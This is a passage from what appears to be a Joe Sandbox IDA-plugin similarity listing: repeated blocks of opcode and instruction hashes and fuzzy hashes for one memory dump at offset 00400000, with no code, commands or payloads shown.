• Instruction ID: afea596ac8bc0714b034837bae490f4d63f644dfc807740420400da5409030ce
• Opcode Fuzzy Hash: 92ea9aa079de7fb9bd51e09e57d1fcde5d50bc4bbef5ffc2488bdc77a794a51a
• Instruction Fuzzy Hash: 74818B7170C3918BE7248F2898D17ABBBD2EFD2350F288A2ED5D95B3C2C2795405C796

Memory Dump Source
• Source File: 00000002.00000002.1995762833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_external.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2bc29a7ea6cd0604e70ee0318e9536c6662704ac7003116416fa437163963bae
• Instruction ID: 973b506937865c4c2e63bd915f81286600089bb7919b7fa6c5aab8a96018ecbd
• Opcode Fuzzy Hash: 2bc29a7ea6cd0604e70ee0318e9536c6662704ac7003116416fa437163963bae
• Instruction Fuzzy Hash: 04617A39A0C3904FC725CF2AC89096A7BE1AF95314F4882AEECD54B392D639DC45C796

Memory Dump Source
• Source File: 00000002.00000002.1995762833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_external.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c2fd4d3e156d30c0c2b8dc8dc78c1b6c267880f9e00ddefb7542dcc745552709
• Instruction ID: cbccf7837cbb52881afaf6f19a9edc16f575d8d6587cfd46589fff812df3488c
• Opcode Fuzzy Hash: c2fd4d3e156d30c0c2b8dc8dc78c1b6c267880f9e00ddefb7542dcc745552709
• Instruction Fuzzy Hash: B421A237E6183047D310CD59CC4479172A6ABD9338F3E87B98864AB796C97BAC0386C4

Memory Dump Source
• Source File: 00000002.00000002.1995762833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_external.jbxd
Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 75b61d89b1b76f821bdd40484b7f94d166381a3fdcbc567675e5e606dfa2e1a6
                                                                                                          • Instruction ID: 5300fe9fc91f9026743e17c6e8b2c7a0bce9359ab00608abf1de71f9c7ff90fc
                                                                                                          • Opcode Fuzzy Hash: 75b61d89b1b76f821bdd40484b7f94d166381a3fdcbc567675e5e606dfa2e1a6
                                                                                                          • Instruction Fuzzy Hash: DB118E7664D3415FD708CF21995111FBBE2EBD6658F28991DD0C5AB305C634C6078F8B
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.1995762833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_400000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                          • Instruction ID: 5ec5d6c59c1e94e7dbfe714b309442f25c10596a18a45ef6db2434c44a5edb13
                                                                                                          • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                          • Instruction Fuzzy Hash: 3311AC33A451D40EC3168D3C8400566BFA30AD7635F5993DAF4B8972D2D52A8E8B8759
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.1995762833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_400000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 6e668f0443b00a77aa73fb05eb0e6595b865b3f7c1a7071fde2abdda04867b9c
                                                                                                          • Instruction ID: 1603fbe25d9d62ac7efbf0a9bc568c13da77a8636866b7ae41a220bdf5de71ca
                                                                                                          • Opcode Fuzzy Hash: 6e668f0443b00a77aa73fb05eb0e6595b865b3f7c1a7071fde2abdda04867b9c
                                                                                                          • Instruction Fuzzy Hash: 1E01B5F2B0131247D720AE15E4C1737B3A96F41718F48443EE8489B342EB79EC44C299
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.1995762833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_400000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: bba0dd9bfe126a0a1007eca9b7cc56abc64e1f946ac9a55177cf0de369d43e32
                                                                                                          • Instruction ID: 521746e10946ceec52cc8fd8b278a23a38d98d1378d11ce092e4152f88e80811
                                                                                                          • Opcode Fuzzy Hash: bba0dd9bfe126a0a1007eca9b7cc56abc64e1f946ac9a55177cf0de369d43e32
                                                                                                          • Instruction Fuzzy Hash: 75F0E53064C354A7E2159B679C91B2FEDBA4FD6704F20952DF093A71C0D138A501471F
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.1995762833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_400000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 2850f60c7fe46f9afd52298c7eb8645978ceb9fdd0edb91bd12347ee85e2a54a
                                                                                                          • Instruction ID: 7b2041dc8fdfdb9a0a4cb66638daaf23583e981a2faa632238d19c5cfd44ba2f
                                                                                                          • Opcode Fuzzy Hash: 2850f60c7fe46f9afd52298c7eb8645978ceb9fdd0edb91bd12347ee85e2a54a
                                                                                                          • Instruction Fuzzy Hash: 0DB012D6C0810046D1009F10AC81435A13C1107106F003434D009F7103E534E604415E